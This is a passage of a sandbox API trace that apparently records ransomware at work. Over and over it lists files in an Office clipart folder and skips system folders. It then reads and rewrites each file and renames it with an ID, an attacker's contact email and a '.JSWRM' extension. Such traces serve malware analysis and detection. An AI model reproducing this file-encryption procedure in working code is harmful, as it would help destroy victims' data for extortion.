lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0089.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0089.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0089.005] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0089.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0089.005] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.005] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0089.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.006] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9e8a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0290548.WMF", cAlternateFileName="")) returned 1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2=".") returned 1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="..") returned 1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="...") returned 1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="windows") returned -1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="recovery") returned -1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="perflogs") returned -1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="documents and settings") returned 1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="system volume information") returned -1 [0089.006] lstrcmpiW (lpString1="J0290548.WMF", lpString2="msocache") returned -1 [0089.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0290548.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0290548.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0290548.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0089.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0290548.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.006] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0290548.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0290548.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0089.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0089.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0089.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.007] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40586) returned 1 [0089.007] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9e80) returned 0x24d210 [0089.007] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x9e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x9e80, lpOverlapped=0x0) returned 1 [0089.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.012] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x9e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x9e80, lpOverlapped=0x0) returned 1 [0089.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.012] CloseHandle (hObject=0x314) returned 1 [0089.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0089.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0089.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.014] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2590, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0291794.WMF", cAlternateFileName="")) returned 1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2=".") returned 1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="..") returned 1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="...") returned 1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="windows") returned -1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="recovery") returned -1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="perflogs") returned -1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="documents and settings") returned 1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="system volume information") returned -1 [0089.014] lstrcmpiW (lpString1="J0291794.WMF", lpString2="msocache") returned -1 [0089.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0089.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0291794.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0291794.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0291794.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0089.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0089.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0291794.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0291794.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0291794.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0089.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0089.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.015] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9616) returned 1 [0089.015] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24d210 [0089.016] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2590, lpOverlapped=0x0) returned 1 [0089.022] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.022] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2590, lpOverlapped=0x0) returned 1 [0089.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.023] CloseHandle (hObject=0x314) returned 1 [0089.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0089.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0089.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0089.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0089.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.023] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.024] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3ba90e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0292248.WMF", cAlternateFileName="")) returned 1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2=".") returned 1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="..") returned 1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="...") returned 1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="windows") returned -1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="recovery") returned -1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="perflogs") returned -1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="documents and settings") returned 1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="system volume information") returned -1 [0089.024] lstrcmpiW (lpString1="J0292248.WMF", lpString2="msocache") returned -1 [0089.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292248.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292248.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292248.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292248.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0292248.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0292248.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0089.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.026] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8420) returned 1 [0089.026] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20e0) returned 0x205850 [0089.026] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x20e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x20e0, lpOverlapped=0x0) returned 1 [0089.028] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.028] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x20e0, lpOverlapped=0x0) returned 1 [0089.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.028] CloseHandle (hObject=0x314) returned 1 [0089.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0089.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0089.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0089.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0089.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.029] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 